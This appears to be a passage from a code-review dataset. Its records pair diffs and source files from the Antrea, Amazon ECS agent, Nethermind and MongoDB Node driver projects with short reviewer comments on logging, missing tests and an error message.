:= toGroupSelector("", cg.Spec.PodSelector, cg.Spec.NamespaceSelector, nil) internalGroup.Selector = *groupSelector return &internalGroup } // 
filterInternalGroupsForPod computes a list of internal Group keys which match the Pod's labels. func (n *NetworkPolicyController) filterInternalGroupsForPod(obj metav1.Object) sets.String { matchingKeySet := sets.String{} clusterScopedGroups, _ := n.internalGroupStore.GetByIndex(cache.NamespaceIndex, "") ns, _ := n.namespaceLister.Get(obj.GetNamespace()) for _, group := range clusterScopedGroups { key, _ := store.GroupKeyFunc(group) g := group.(*antreatypes.Group) if n.labelsMatchGroupSelector(obj, ns, &g.Selector) { matchingKeySet.Insert(key) klog.V(2).Infof("%s/%s matched internal Group %s", obj.GetNamespace(), obj.GetName(), key) } } return matchingKeySet } // filterInternalGroupsForNamespace computes a list of internal Group keys which // match the Namespace's labels. func (n *NetworkPolicyController) filterInternalGroupsForNamespace(namespace *v1.Namespace) sets.String { matchingKeys := sets.String{} groups, _ := n.internalGroupStore.GetByIndex(cache.NamespaceIndex, "") for _, group := range groups { key, _ := store.GroupKeyFunc(group) g := group.(*antreatypes.Group) if g.Selector.NamespaceSelector != nil && g.Selector.NamespaceSelector.Matches(labels.Set(namespace.Labels)) { matchingKeys.Insert(key) klog.V(2).Infof("Namespace %s matched internal Group %s", namespace.Name, key) } } return matchingKeys } func (n *NetworkPolicyController) enqueueInternalGroup(key string) { klog.V(4).Infof("Adding new key %s to internal Group queue", key) n.internalGroupQueue.Add(key) } func (c *NetworkPolicyController) internalGroupWorker() { for c.processNextInternalGroupWorkItem() { } } // Processes an item in the "internalGroup" work queue, by calling // syncInternalGroup after casting the item to a string (Group key). // If syncInternalGroup returns an error, this function handles it by re-queueing // the item so that it can be processed again later. If syncInternalGroup is // successful, the ClusterGroup is removed from the queue until we get notify // of a new change. 
This function return false if and only if the work queue // was shutdown (no more items will be processed). func (c *NetworkPolicyController) processNextInternalGroupWorkItem() bool { key, quit := c.internalGroupQueue.Get() if quit { return false } defer c.internalGroupQueue.Done(key) err := c.syncInternalGroup(key.(string)) if err != nil { // Put the item back in the workqueue to handle any transient errors. c.internalGroupQueue.AddRateLimited(key) klog.Errorf("Failed to sync internal Group %s: %v", key, err) return true } // If no error occurs we Forget this item so it does not get queued again until // another change happens. c.internalGroupQueue.Forget(key) return true } func (n *NetworkPolicyController) syncInternalGroup(key string) error { // Retrieve the internal Group corresponding to this key. grpObj, found, _ := n.internalGroupStore.Get(key) if !found { klog.V(2).Infof("Internal group %s not found.", key) return nil } grp := grpObj.(*antreatypes.Group) if grp.IPBlock == nil { // Find all Pods matching its selectors and update store. groupSelector := grp.Selector pods, _ := n.processSelector(groupSelector) memberSet := controlplane.GroupMemberSet{} for _, pod := range pods { if len(pod.Status.PodIPs) == 0 { // No need to insert Pod IPAddress when it is unset. continue } memberSet.Insert(podToGroupMember(pod, true)) } // Update the internal Group object in the store with the Pods as GroupMembers. updatedGrp := &antreatypes.Group{ UID: grp.UID, Name: grp.Name, Selector: grp.Selector, GroupMembers: memberSet, } klog.V(2).Infof("Updating existing internal Group %s with %d GroupMembers", key, len(memberSet)) n.internalGroupStore.Update(updatedGrp) } // Retrieve the ClusterGroup corresponding to this key. 
cg, err := n.cgLister.Get(grp.Name) if err != nil { klog.Infof("Didn't find the ClusterGroup %s, skip processing of internal group", grp.Name) return nil } // Update the ClusterGroup status to Realized as Antrea has recognized the Group and // processed its group members. err = n.updateGroupStatus(cg, v1.ConditionTrue) if err != nil { klog.Errorf("Failed to update ClusterGroup %s GroupMembersComputed condition to %s: %v", cg.Name, v1.ConditionTrue, err) return err } return n.triggerCNPUpdates(cg) } // triggerCNPUpdates triggers processing of ClusterNetworkPolicies associated with the input ClusterGroup. func (n *NetworkPolicyController) triggerCNPUpdates(cg *corev1a2.ClusterGroup) error { // If a ClusterGroup is added/updated, it might have a reference in ClusterNetworkPolicy. cnps, err := n.cnpInformer.Informer().GetIndexer().ByIndex(ClusterGroupIndex, cg.Name) if err != nil { klog.Errorf("Error retrieving ClusterNetworkPolicies corresponding to ClusterGroup %s", cg.Name) return err } for _, obj := range cnps { cnp := obj.(*secv1alpha1.ClusterNetworkPolicy) // Re-process ClusterNetworkPolicies which may be affected due to updates to CG. curInternalNP := n.processClusterNetworkPolicy(cnp) klog.V(2).Infof("Updating existing internal NetworkPolicy %s for %s", curInternalNP.Name, curInternalNP.SourceRef.ToString()) key := internalNetworkPolicyKeyFunc(cnp) // Lock access to internal NetworkPolicy store such that concurrent access // to an internal NetworkPolicy is not allowed. This will avoid the // case in which an Update to an internal NetworkPolicy object may // cause the SpanMeta member to be overridden with stale SpanMeta members // from an older internal NetworkPolicy. n.internalNetworkPolicyMutex.Lock() oldInternalNPObj, _, _ := n.internalNetworkPolicyStore.Get(key) oldInternalNP := oldInternalNPObj.(*antreatypes.NetworkPolicy) // Must preserve old internal NetworkPolicy Span. 
curInternalNP.SpanMeta = oldInternalNP.SpanMeta n.internalNetworkPolicyStore.Update(curInternalNP) // Unlock the internal NetworkPolicy store. n.internalNetworkPolicyMutex.Unlock() // Enqueue addressGroup keys to update their group members. // TODO: optimize this to avoid enqueueing address groups when not updated. for _, atg := range curInternalNP.AppliedToGroups { n.enqueueAppliedToGroup(atg) } for _, rule := range curInternalNP.Rules { for _, addrGroupName := range rule.From.AddressGroups { n.enqueueAddressGroup(addrGroupName) } for _, addrGroupName := range rule.To.AddressGroups { n.enqueueAddressGroup(addrGroupName) } } n.enqueueInternalNetworkPolicy(key) n.deleteDereferencedAddressGroups(oldInternalNP) for _, atg := range oldInternalNP.AppliedToGroups { n.deleteDereferencedAppliedToGroup(atg) } } return nil } // updateGroupStatus updates the Status subresource for a ClusterGroup. func (n *NetworkPolicyController) updateGroupStatus(cg *corev1a2.ClusterGroup, cStatus v1.ConditionStatus) error { condStatus := corev1a2.GroupCondition{ Status: cStatus, Type: corev1a2.GroupMembersComputed, } if groupMembersComputedConditionEqual(cg.Status.Conditions, condStatus) { // There is no change in conditions. return nil } condStatus.LastTransitionTime = metav1.Now() status := corev1a2.GroupStatus{ Conditions: []corev1a2.GroupCondition{condStatus}, } klog.V(4).Infof("Updating ClusterGroup %s status to %#v", cg.Name, condStatus) toUpdate := cg.DeepCopy() toUpdate.Status = status _, err := n.crdClient.CoreV1alpha2().ClusterGroups().UpdateStatus(context.TODO(), toUpdate, metav1.UpdateOptions{}) return err } // groupMembersComputedConditionEqual checks whether the condition status for GroupMembersComputed condition // is same. Returns true if equal, otherwise returns false. It disregards the lastTransitionTime field. 
func groupMembersComputedConditionEqual(conds []corev1a2.GroupCondition, condition corev1a2.GroupCondition) bool { for _, c := range conds { if c.Type == corev1a2.GroupMembersComputed { if c.Status == condition.Status { return true } } } return false } // GetAssociatedGroups retrieves the internal Groups associated with the entity being // queried (Pod or ExternalEntity identified by name and namespace). func (n *NetworkPolicyController) GetAssociatedGroups(name, namespace string) ([]antreatypes.Group, error) { memberKey := k8s.NamespacedName(namespace, name) groups, err := n.internalGroupStore.GetByIndex(store.GroupMemberIndex, memberKey) if err != nil { return nil, fmt.Errorf("failed to retrieve Group associated with key %s", memberKey) } groupObjs := make([]antreatypes.Group, len(groups)) for i, g := range groups { groupObjs[i] = *g.(*antreatypes.Group) } return groupObjs, nil } // GetGroupMembers returns the current members of a ClusterGroup. func (n *NetworkPolicyController) GetGroupMembers(cgName string) (controlplane.GroupMemberSet, error) { g, found, err := n.internalGroupStore.Get(cgName) if err != nil || !found { return nil, fmt.Errorf("failed to get internal group associated with ClusterGroup %s", cgName) } internalGroup := g.(*antreatypes.Group) return internalGroup.GroupMembers, nil }
1
32,236
nit.. `if` .. `else` for logging probably can be avoided.. maybe only log that an internal group was created for cluster group
antrea-io-antrea
go
@@ -21,6 +21,7 @@ import ( "time" "github.com/aws/amazon-ecs-agent/agent/api" + "github.com/aws/amazon-ecs-agent/agent/config" "github.com/aws/amazon-ecs-agent/agent/engine/dockerstate/mocks" "github.com/aws/amazon-ecs-agent/agent/engine/testdata" "github.com/aws/amazon-ecs-agent/agent/eventstream"
1
// +build !integration // Copyright 2014-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved. // // Licensed under the Apache License, Version 2.0 (the "License"). You may // not use this file except in compliance with the License. A copy of the // License is located at // // http://aws.amazon.com/apache2.0/ // // or in the "license" file accompanying this file. This file is distributed // on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either // express or implied. See the License for the specific language governing // permissions and limitations under the License. package engine import ( "fmt" "sync" "testing" "time" "github.com/aws/amazon-ecs-agent/agent/api" "github.com/aws/amazon-ecs-agent/agent/engine/dockerstate/mocks" "github.com/aws/amazon-ecs-agent/agent/engine/testdata" "github.com/aws/amazon-ecs-agent/agent/eventstream" "github.com/aws/amazon-ecs-agent/agent/statechange" "github.com/aws/amazon-ecs-agent/agent/statemanager" "github.com/aws/amazon-ecs-agent/agent/utils/ttime/mocks" "github.com/stretchr/testify/assert" "github.com/golang/mock/gomock" "golang.org/x/net/context" ) func TestContainerNextState(t *testing.T) { testCases := []struct { containerCurrentStatus api.ContainerStatus containerDesiredStatus api.ContainerStatus expectedContainerStatus api.ContainerStatus expectedTransitionActionable bool expectedTransitionPossible bool }{ // NONE -> RUNNING transition is allowed and actionable, when desired is Running // The exptected next status is Pulled {api.ContainerStatusNone, api.ContainerRunning, api.ContainerPulled, true, true}, // NONE -> NONE transition is not be allowed and is not actionable, // when desired is Running {api.ContainerStatusNone, api.ContainerStatusNone, api.ContainerStatusNone, false, false}, // NONE -> STOPPED transition will result in STOPPED and is allowed, but not // actionable, when desired is STOPPED {api.ContainerStatusNone, api.ContainerStopped, api.ContainerStopped, false, true}, // PULLED 
-> RUNNING transition is allowed and actionable, when desired is Running // The exptected next status is Created {api.ContainerPulled, api.ContainerRunning, api.ContainerCreated, true, true}, // PULLED -> PULLED transition is not allowed and not actionable, // when desired is Running {api.ContainerPulled, api.ContainerPulled, api.ContainerStatusNone, false, false}, // PULLED -> NONE transition is not allowed and not actionable, // when desired is Running {api.ContainerPulled, api.ContainerStatusNone, api.ContainerStatusNone, false, false}, // PULLED -> STOPPED transition will result in STOPPED and is allowed, but not // actionable, when desired is STOPPED {api.ContainerPulled, api.ContainerStopped, api.ContainerStopped, false, true}, // CREATED -> RUNNING transition is allowed and actionable, when desired is Running // The exptected next status is Running {api.ContainerCreated, api.ContainerRunning, api.ContainerRunning, true, true}, // CREATED -> CREATED transition is not allowed and not actionable, // when desired is Running {api.ContainerCreated, api.ContainerCreated, api.ContainerStatusNone, false, false}, // CREATED -> NONE transition is not allowed and not actionable, // when desired is Running {api.ContainerCreated, api.ContainerStatusNone, api.ContainerStatusNone, false, false}, // CREATED -> PULLED transition is not allowed and not actionable, // when desired is Running {api.ContainerCreated, api.ContainerPulled, api.ContainerStatusNone, false, false}, // CREATED -> STOPPED transition will result in STOPPED and is allowed, but not // actionable, when desired is STOPPED {api.ContainerCreated, api.ContainerStopped, api.ContainerStopped, false, true}, // RUNNING -> STOPPED transition is allowed and actionable, when desired is Running // The exptected next status is STOPPED {api.ContainerRunning, api.ContainerStopped, api.ContainerStopped, true, true}, // RUNNING -> RUNNING transition is not allowed and not actionable, // when desired is Running 
{api.ContainerRunning, api.ContainerRunning, api.ContainerStatusNone, false, false}, // RUNNING -> NONE transition is not allowed and not actionable, // when desired is Running {api.ContainerRunning, api.ContainerStatusNone, api.ContainerStatusNone, false, false}, // RUNNING -> PULLED transition is not allowed and not actionable, // when desired is Running {api.ContainerRunning, api.ContainerPulled, api.ContainerStatusNone, false, false}, // RUNNING -> CREATED transition is not allowed and not actionable, // when desired is Running {api.ContainerRunning, api.ContainerCreated, api.ContainerStatusNone, false, false}, } for _, tc := range testCases { t.Run(fmt.Sprintf("%s to %s Transition", tc.containerCurrentStatus.String(), tc.containerDesiredStatus.String()), func(t *testing.T) { container := &api.Container{ DesiredStatusUnsafe: tc.containerDesiredStatus, KnownStatusUnsafe: tc.containerCurrentStatus, } task := &managedTask{ Task: &api.Task{ Containers: []*api.Container{ container, }, DesiredStatusUnsafe: api.TaskRunning, }, } nextStatus, actionRequired, possible := task.containerNextState(container) assert.Equal(t, tc.expectedContainerStatus, nextStatus, "Expected next state [%s] != Retrieved next state [%s]", tc.expectedContainerStatus.String(), nextStatus.String()) assert.Equal(t, tc.expectedTransitionActionable, actionRequired) assert.Equal(t, tc.expectedTransitionPossible, possible) }) } } func TestStartContainerTransitionsWhenForwardTransitionPossible(t *testing.T) { firstContainerName := "container1" firstContainer := &api.Container{ KnownStatusUnsafe: api.ContainerCreated, DesiredStatusUnsafe: api.ContainerRunning, Name: firstContainerName, } secondContainerName := "container2" secondContainer := &api.Container{ KnownStatusUnsafe: api.ContainerPulled, DesiredStatusUnsafe: api.ContainerRunning, Name: secondContainerName, } task := &managedTask{ Task: &api.Task{ Containers: []*api.Container{ firstContainer, secondContainer, }, DesiredStatusUnsafe: 
api.TaskRunning, }, engine: &DockerTaskEngine{}, } waitForAssertions := sync.WaitGroup{} waitForAssertions.Add(2) canTransition, transitions := task.startContainerTransitions( func(cont *api.Container, nextStatus api.ContainerStatus) { if cont.Name == firstContainerName { assert.Equal(t, nextStatus, api.ContainerRunning) } else if cont.Name == secondContainerName { assert.Equal(t, nextStatus, api.ContainerCreated) } waitForAssertions.Done() }) waitForAssertions.Wait() assert.True(t, canTransition) assert.NotEmpty(t, transitions) assert.Len(t, transitions, 2) firstContainerTransition, ok := transitions[firstContainerName] assert.True(t, ok) assert.Equal(t, firstContainerTransition, api.ContainerRunning) secondContainerTransition, ok := transitions[secondContainerName] assert.True(t, ok) assert.Equal(t, secondContainerTransition, api.ContainerCreated) } func TestStartContainerTransitionsWhenForwardTransitionIsNotPossible(t *testing.T) { firstContainerName := "container1" firstContainer := &api.Container{ KnownStatusUnsafe: api.ContainerRunning, DesiredStatusUnsafe: api.ContainerRunning, Name: firstContainerName, } secondContainerName := "container2" secondContainer := &api.Container{ KnownStatusUnsafe: api.ContainerRunning, DesiredStatusUnsafe: api.ContainerRunning, Name: secondContainerName, } task := &managedTask{ Task: &api.Task{ Containers: []*api.Container{ firstContainer, secondContainer, }, DesiredStatusUnsafe: api.TaskRunning, }, engine: &DockerTaskEngine{}, } canTransition, transitions := task.startContainerTransitions( func(cont *api.Container, nextStatus api.ContainerStatus) { t.Error("Transition function should not be called when no transitions are possible") }) assert.False(t, canTransition) assert.Empty(t, transitions) } func TestStartContainerTransitionsInvokesHandleContainerChange(t *testing.T) { eventStreamName := "TESTTASKENGINE" // Create a container with the intent to do // CREATERD -> STOPPED transition. 
This triggers // `managedTask.handleContainerChange()` and generates the following // events: // 1. container state change event for Submit* API // 2. task state change event for Submit* API // 3. container state change event for the internal event stream firstContainerName := "container1" firstContainer := &api.Container{ KnownStatusUnsafe: api.ContainerCreated, DesiredStatusUnsafe: api.ContainerStopped, Name: firstContainerName, } containerChangeEventStream := eventstream.NewEventStream(eventStreamName, context.Background()) containerChangeEventStream.StartListening() stateChangeEvents := make(chan statechange.Event) task := &managedTask{ Task: &api.Task{ Containers: []*api.Container{ firstContainer, }, DesiredStatusUnsafe: api.TaskRunning, }, engine: &DockerTaskEngine{ containerChangeEventStream: containerChangeEventStream, stateChangeEvents: stateChangeEvents, }, } eventsGenerated := sync.WaitGroup{} eventsGenerated.Add(2) containerChangeEventStream.Subscribe(eventStreamName, func(events ...interface{}) error { assert.NotNil(t, events) assert.Len(t, events, 1) event := events[0] containerChangeEvent, ok := event.(DockerContainerChangeEvent) assert.True(t, ok) assert.Equal(t, containerChangeEvent.Status, api.ContainerStopped) eventsGenerated.Done() return nil }) defer containerChangeEventStream.Unsubscribe(eventStreamName) // account for container and task state change events for Submit* API go func() { <-stateChangeEvents <-stateChangeEvents eventsGenerated.Done() }() canTransition, transitions := task.startContainerTransitions( func(cont *api.Container, nextStatus api.ContainerStatus) { t.Error("Invalid code path. 
The transition function should not be invoked when transitioning container from CREATED -> STOPPED") }) assert.True(t, canTransition) assert.Empty(t, transitions) eventsGenerated.Wait() } func TestWaitForContainerTransitionsForNonTerminalTask(t *testing.T) { acsMessages := make(chan acsTransition) dockerMessages := make(chan dockerContainerChange) task := &managedTask{ acsMessages: acsMessages, dockerMessages: dockerMessages, Task: &api.Task{ Containers: []*api.Container{}, }, } transitionChange := make(chan bool, 2) transitionChangeContainer := make(chan string, 2) firstContainerName := "container1" secondContainerName := "container2" // populate the transitions map with transitions for two // containers. We expect two sets of events to be consumed // by `waitForContainerTransitions` transitions := make(map[string]api.ContainerStatus) transitions[firstContainerName] = api.ContainerRunning transitions[secondContainerName] = api.ContainerRunning go func() { // Send "transitions completed" messages. These are being // sent out of order for no particular reason. We should be // resilient to the ordering of these messages anyway. 
transitionChange <- true transitionChangeContainer <- secondContainerName transitionChange <- true transitionChangeContainer <- firstContainerName }() // waitForContainerTransitions will block until it recieves events // sent by the go routine defined above task.waitForContainerTransitions(transitions, transitionChange, transitionChangeContainer) } // TestWaitForContainerTransitionsForTerminalTask verifies that the // `waitForContainerTransitions` method doesn't wait for any container // transitions when the task's desired status is STOPPED and if all // containers in the task are in PULLED state func TestWaitForContainerTransitionsForTerminalTask(t *testing.T) { acsMessages := make(chan acsTransition) dockerMessages := make(chan dockerContainerChange) task := &managedTask{ acsMessages: acsMessages, dockerMessages: dockerMessages, Task: &api.Task{ Containers: []*api.Container{}, KnownStatusUnsafe: api.TaskStopped, }, } transitionChange := make(chan bool, 2) transitionChangeContainer := make(chan string, 2) firstContainerName := "container1" secondContainerName := "container2" transitions := make(map[string]api.ContainerStatus) transitions[firstContainerName] = api.ContainerPulled transitions[secondContainerName] = api.ContainerPulled // Event though there are two keys in the transitions map, send // only one event. 
This tests that `waitForContainerTransitions` doesn't // block to recieve two events and will still progress go func() { transitionChange <- true transitionChangeContainer <- secondContainerName }() task.waitForContainerTransitions(transitions, transitionChange, transitionChangeContainer) } func TestOnContainersUnableToTransitionStateForDesiredStoppedTask(t *testing.T) { stateChangeEvents := make(chan statechange.Event) task := &managedTask{ Task: &api.Task{ Containers: []*api.Container{}, DesiredStatusUnsafe: api.TaskStopped, }, engine: &DockerTaskEngine{ stateChangeEvents: stateChangeEvents, }, } eventsGenerated := sync.WaitGroup{} eventsGenerated.Add(1) go func() { event := <-stateChangeEvents assert.Equal(t, event.(api.TaskStateChange).Reason, taskUnableToTransitionToStoppedReason) eventsGenerated.Done() }() task.onContainersUnableToTransitionState() eventsGenerated.Wait() assert.Equal(t, task.GetDesiredStatus(), api.TaskStopped) } func TestOnContainersUnableToTransitionStateForDesiredRunningTask(t *testing.T) { firstContainerName := "container1" firstContainer := &api.Container{ KnownStatusUnsafe: api.ContainerCreated, DesiredStatusUnsafe: api.ContainerRunning, Name: firstContainerName, } task := &managedTask{ Task: &api.Task{ Containers: []*api.Container{ firstContainer, }, DesiredStatusUnsafe: api.TaskRunning, }, } task.onContainersUnableToTransitionState() assert.Equal(t, task.GetDesiredStatus(), api.TaskStopped) assert.Equal(t, task.Containers[0].GetDesiredStatus(), api.ContainerStopped) } // TODO: Test progressContainers workflow // TODO: Test handleStoppedToRunningContainerTransition func TestCleanupTask(t *testing.T) { ctrl := gomock.NewController(t) mockTime := mock_ttime.NewMockTime(ctrl) mockState := mock_dockerstate.NewMockTaskEngineState(ctrl) mockClient := NewMockDockerClient(ctrl) mockImageManager := NewMockImageManager(ctrl) defer ctrl.Finish() taskEngine := &DockerTaskEngine{ saver: statemanager.NewNoopStateManager(), state: mockState, client: 
mockClient, imageManager: mockImageManager, } mTask := &managedTask{ Task: testdata.LoadTask("sleep5"), _time: mockTime, engine: taskEngine, acsMessages: make(chan acsTransition), dockerMessages: make(chan dockerContainerChange), } mTask.SetKnownStatus(api.TaskStopped) mTask.SetSentStatus(api.TaskStopped) container := mTask.Containers[0] dockerContainer := &api.DockerContainer{ DockerName: "dockerContainer", } // Expectations for triggering cleanup now := mTask.GetKnownStatusTime() taskStoppedDuration := 1 * time.Minute mockTime.EXPECT().Now().Return(now).AnyTimes() cleanupTimeTrigger := make(chan time.Time) mockTime.EXPECT().After(gomock.Any()).Return(cleanupTimeTrigger) go func() { cleanupTimeTrigger <- now }() // Expectations to verify that the task gets removed mockState.EXPECT().ContainerMapByArn(mTask.Arn).Return(map[string]*api.DockerContainer{container.Name: dockerContainer}, true) mockClient.EXPECT().RemoveContainer(dockerContainer.DockerName, gomock.Any()).Return(nil) mockImageManager.EXPECT().RemoveContainerReferenceFromImageState(container).Return(nil) mockState.EXPECT().RemoveTask(mTask.Task) mTask.cleanupTask(taskStoppedDuration) } func TestCleanupTaskWaitsForStoppedSent(t *testing.T) { ctrl := gomock.NewController(t) mockTime := mock_ttime.NewMockTime(ctrl) mockState := mock_dockerstate.NewMockTaskEngineState(ctrl) mockClient := NewMockDockerClient(ctrl) mockImageManager := NewMockImageManager(ctrl) defer ctrl.Finish() taskEngine := &DockerTaskEngine{ saver: statemanager.NewNoopStateManager(), state: mockState, client: mockClient, imageManager: mockImageManager, } mTask := &managedTask{ Task: testdata.LoadTask("sleep5"), _time: mockTime, engine: taskEngine, acsMessages: make(chan acsTransition), dockerMessages: make(chan dockerContainerChange), } mTask.SetKnownStatus(api.TaskStopped) mTask.SetSentStatus(api.TaskRunning) container := mTask.Containers[0] dockerContainer := &api.DockerContainer{ DockerName: "dockerContainer", } // Expectations for 
triggering cleanup now := mTask.GetKnownStatusTime() taskStoppedDuration := 1 * time.Minute mockTime.EXPECT().Now().Return(now).AnyTimes() cleanupTimeTrigger := make(chan time.Time) mockTime.EXPECT().After(gomock.Any()).Return(cleanupTimeTrigger) go func() { cleanupTimeTrigger <- now }() timesCalled := 0 callsExpected := 3 mockTime.EXPECT().Sleep(gomock.Any()).AnyTimes().Do(func(_ interface{}) { timesCalled++ if timesCalled == callsExpected { mTask.SetSentStatus(api.TaskStopped) } else if timesCalled > callsExpected { t.Errorf("Sleep called too many times, called %d but expected %d", timesCalled, callsExpected) } }) assert.Equal(t, api.TaskRunning, mTask.GetSentStatus()) // Expectations to verify that the task gets removed mockState.EXPECT().ContainerMapByArn(mTask.Arn).Return(map[string]*api.DockerContainer{container.Name: dockerContainer}, true) mockClient.EXPECT().RemoveContainer(dockerContainer.DockerName, gomock.Any()).Return(nil) mockImageManager.EXPECT().RemoveContainerReferenceFromImageState(container).Return(nil) mockState.EXPECT().RemoveTask(mTask.Task) mTask.cleanupTask(taskStoppedDuration) assert.Equal(t, api.TaskStopped, mTask.GetSentStatus()) } func TestCleanupTaskGivesUpIfWaitingTooLong(t *testing.T) { ctrl := gomock.NewController(t) mockTime := mock_ttime.NewMockTime(ctrl) mockState := mock_dockerstate.NewMockTaskEngineState(ctrl) mockClient := NewMockDockerClient(ctrl) mockImageManager := NewMockImageManager(ctrl) defer ctrl.Finish() taskEngine := &DockerTaskEngine{ saver: statemanager.NewNoopStateManager(), state: mockState, client: mockClient, imageManager: mockImageManager, } mTask := &managedTask{ Task: testdata.LoadTask("sleep5"), _time: mockTime, engine: taskEngine, acsMessages: make(chan acsTransition), dockerMessages: make(chan dockerContainerChange), } mTask.SetKnownStatus(api.TaskStopped) mTask.SetSentStatus(api.TaskRunning) // Expectations for triggering cleanup now := mTask.GetKnownStatusTime() taskStoppedDuration := 1 * time.Minute 
mockTime.EXPECT().Now().Return(now).AnyTimes() cleanupTimeTrigger := make(chan time.Time) mockTime.EXPECT().After(gomock.Any()).Return(cleanupTimeTrigger) go func() { cleanupTimeTrigger <- now }() _maxStoppedWaitTimes = 10 defer func() { // reset _maxStoppedWaitTimes = int(maxStoppedWaitTimes) }() mockTime.EXPECT().Sleep(gomock.Any()).Times(_maxStoppedWaitTimes) assert.Equal(t, api.TaskRunning, mTask.GetSentStatus()) // No cleanup expected mTask.cleanupTask(taskStoppedDuration) assert.Equal(t, api.TaskRunning, mTask.GetSentStatus()) }
1
15,833
There's a lot of changed tests -- but no new tests. You need unit and integration tests for this.
aws-amazon-ecs-agent
go
@@ -38,16 +38,16 @@ namespace Nethermind.TxPool.Filters _configuredGasLimit = txPoolConfig.GasLimit ?? long.MaxValue; } - public (bool Accepted, AddTxResult? Reason) Accept(Transaction tx, TxHandlingOptions handlingOptions) + public AcceptTxResult Accept(Transaction tx, TxHandlingOptions handlingOptions) { long gasLimit = Math.Min(_chainHeadInfoProvider.BlockGasLimit ?? long.MaxValue, _configuredGasLimit); if (tx.GasLimit > gasLimit) { if (_logger.IsTrace) _logger.Trace($"Skipped adding transaction {tx.ToString(" ")}, gas limit exceeded."); - return (false, AddTxResult.GasLimitExceeded); + return AcceptTxResult.GasLimitExceeded; } - return (true, null); + return AcceptTxResult.Accepted; } } }
1
// Copyright (c) 2021 Demerzel Solutions Limited // This file is part of the Nethermind library. // // The Nethermind library is free software: you can redistribute it and/or modify // it under the terms of the GNU Lesser General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // The Nethermind library is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU Lesser General Public License for more details. // // You should have received a copy of the GNU Lesser General Public License // along with the Nethermind. If not, see <http://www.gnu.org/licenses/>. // using System; using Nethermind.Core; using Nethermind.Logging; namespace Nethermind.TxPool.Filters { /// <summary> /// Ignores transactions that outright exceed block gas limit or configured max block gas limit. /// </summary> internal class GasLimitTxFilter : IIncomingTxFilter { private readonly IChainHeadInfoProvider _chainHeadInfoProvider; private readonly ILogger _logger; private readonly long _configuredGasLimit; public GasLimitTxFilter(IChainHeadInfoProvider chainHeadInfoProvider, ITxPoolConfig txPoolConfig, ILogger logger) { _chainHeadInfoProvider = chainHeadInfoProvider; _logger = logger; _configuredGasLimit = txPoolConfig.GasLimit ?? long.MaxValue; } public (bool Accepted, AddTxResult? Reason) Accept(Transaction tx, TxHandlingOptions handlingOptions) { long gasLimit = Math.Min(_chainHeadInfoProvider.BlockGasLimit ?? long.MaxValue, _configuredGasLimit); if (tx.GasLimit > gasLimit) { if (_logger.IsTrace) _logger.Trace($"Skipped adding transaction {tx.ToString(" ")}, gas limit exceeded."); return (false, AddTxResult.GasLimitExceeded); } return (true, null); } } }
1
26,435
WithMessage what gas limit is?
NethermindEth-nethermind
.cs
@@ -2099,7 +2099,7 @@ describe('Cursor', function() { * @ignore * @api private */ - it('cursor stream errors', { + it.skip('cursor stream errors', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single'] } },
1
'use strict'; const test = require('./shared').assert; const setupDatabase = require('./shared').setupDatabase; const fs = require('fs'); const expect = require('chai').expect; const Long = require('bson').Long; const sinon = require('sinon'); const ReadPreference = require('mongodb-core').ReadPreference; const Buffer = require('safe-buffer').Buffer; describe('Cursor', function() { before(function() { return setupDatabase(this.configuration, [ 'cursorkilltest1', 'cursor_session_tests', 'cursor_session_tests2' ]); }); /** * @ignore * @api private */ it('cursorShouldBeAbleToResetOnToArrayRunningQueryAgain', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_to_a', function(err, collection) { test.equal(null, err); collection.insert({ a: 1 }, configuration.writeConcernMax(), function(err) { test.equal(null, err); var cursor = collection.find({}); cursor.toArray(function(err) { test.equal(null, err); // Should fail if called again (cursor should be closed) cursor.toArray(function(err) { test.equal(null, err); // Should fail if called again (cursor should be closed) cursor.each(function(err, item) { test.equal(null, err); // Let's close the db if (!item) { client.close(); done(); } }); }); }); }); }); }); } }); /** * @ignore * @api private */ it('cursor should close after first next operation', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 
'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('close_on_next', function(err, collection) { test.equal(null, err); collection.insert( [{ a: 1 }, { a: 1 }, { a: 1 }], configuration.writeConcernMax(), function(err) { test.equal(null, err); var cursor = collection.find({}); cursor.batchSize(2); cursor.next(function(err) { test.equal(null, err); cursor.close(); client.close(); done(); }); } ); }); }); } }); /** * @ignore * @api private */ it('cursor should trigger getMore', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('trigger_get_more', function(err, collection) { test.equal(null, err); collection.insert( [{ a: 1 }, { a: 1 }, { a: 1 }], configuration.writeConcernMax(), function(err) { test.equal(null, err); var cursor = collection.find({}); cursor.batchSize(2); cursor.toArray(function(err) { test.equal(null, err); client.close(); done(); }); } ); }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlyExecuteCursorExplain', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: 
